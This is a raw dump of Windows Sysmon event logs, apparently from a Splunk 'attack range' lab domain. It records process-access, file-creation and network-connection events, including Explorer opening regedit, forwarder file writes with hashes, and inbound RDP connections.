09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.334{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:58.303{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54A76DD3E56D41617DFAB4C7373EC3D7,SHA256=E1C9D49AA2BF3683B093037B8EC17D6FE2A0AE8AAFD2BCB6E10BD378E0D8D5C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981712Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:54.698{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59565-false10.0.1.12-8000- 23542300x80000000000000001057353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:59.318{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431F5E8EFA134C0C62B67F239BAF8B2E,SHA256=3985F0BF715DEC1E658550CA33EB6C7D4B892069A5D5357CED7BD45F235B3A05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981716Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:56.495{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59977-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981715Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:59.216{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F5023DA729054DBE2BEE1112368630D,SHA256=9F9CF960059B3FB5EA5EB4C97D5FE931671F77A18C1591A56D996583AEF9D3BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981714Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:59.216{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6478DA1090EF3235AE0D46497A1C8F61,SHA256=6A0A81F98EF8B9738E0CBEDE6DD1FEC5CBD1A8EEBEAEF245CBD1215619457996,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:00.600{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=942765C231E5F7AD733AE8FC9A84CBC6,SHA256=90987DDF37A48BE3475FCBDBEAFFDA767DE79980772A7F670D072B801B91BF88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:00.537{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F2A104CB2905E9F1283391CB61F0E55,SHA256=4DAB36EE67245DE431683B324BC1AEEE32809B49A7B54BBC898E27CD931C9654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981717Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:59.998{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B926437529652567D05D8B58C24F856,SHA256=CE68E0CC7719A79D496E901B48FB07B1456277046CA5D51356E746D80AE57294,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:00.073{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54288-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:01.647{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC09CEDA3F15D9C91716155036F147D,SHA256=B5E87313FD057552FB8876BE052AB2A84A990C7F346B905FB60CD661198E66A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981718Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:01.185{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=190AF3A8A7502AC4C1455D5B6EDD1A8E,SHA256=0D96B3AA2A47466DCAC43FB910145075098EE92D627187FCFFA68CFBDF3DD1A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:02.647{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BBD9C3FA42CCC99DD73CC5C1974B262,SHA256=1F7FDB20E7372309EDFA48CABD6C8ABC8C1F6B53AC63AA68DD0650C3D5126179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981722Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:02.935{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F5023DA729054DBE2BEE1112368630D,SHA256=9F9CF960059B3FB5EA5EB4C97D5FE931671F77A18C1591A56D996583AEF9D3BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981721Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:59.776{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59566-false10.0.1.12-8000- 354300x8000000000000000981720Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:59.508{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59308-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981719Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:02.373{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3CFA19AC8E1E719B4A5D25B2186008,SHA256=12A6A9F550347BD4FEC596A1AE70711403AB02D120657F4D02E37B32F232A4AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:03.871{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC759D677582A89430E25A1870E7F8BC,SHA256=5003E5178C8B9510195FBC8E2FC9743867E678C486E6BB2AA6AA6B08F3F1F85E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981723Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:03.378{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4EB6F47B9D71B243736F66BFF6A904,SHA256=FCCF481C23C54CAAB2A6698DEE2061E261CECF3720CBB936CD0B236B8878E76C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:03.668{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E11009D166E7A6D6526A4A7921FAE9D9,SHA256=FB866539F7BC880BB75FBA892D5965739D0F9F0AAFC3FDB75B5EE7DC74F03798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:03.668{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4BADB84549E7AB6D1913659FBCF2A15F,SHA256=EA16CB7BE7CA491A8F24A1D41303F9C8E887D41A830828EA8AC888184A37810B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:04.950{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3365AB7DD5C6FA9A1F17F49F113955F,SHA256=D18CCE8A7C60839215D3ABD09D81920C3D2CAFEA19235EC2E29E9018A5EEC2F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981724Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:04.378{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B840A0176821B853F7F3BDE0B612CC0,SHA256=3446B6AA59671C359861AC8D1CE7148A126839D7B33DD47AB8CC1907BCE40EE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:02.799{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63674-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:04.184{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED94DA5F5AB282606A8C6A086299E7C4,SHA256=2B531F2D34DFFEEAE18636067F78E2289F380CC032B881F138047A9692576B20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:04.184{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C08D8867A00E3544FA4023F0A2F2DC0D,SHA256=9A88F5E7C040D87EFCDDEC3C40930599AE6160BEEA2A31371CB1E6B2CE53E843,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981728Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:02.549{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61209-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981727Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:05.612{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF88A306C43F987208F3C044666827CC,SHA256=47FB54F7D672EA0D51E9420ABBC88F07ADBD55631705A16E3170D051AF1D1E43,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:03.842{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61277-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001057394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED94DA5F5AB282606A8C6A086299E7C4,SHA256=2B531F2D34DFFEEAE18636067F78E2289F380CC032B881F138047A9692576B20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:05.403{5EBD8912-8CBF-6151-0D00-00000000FD01}900924C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 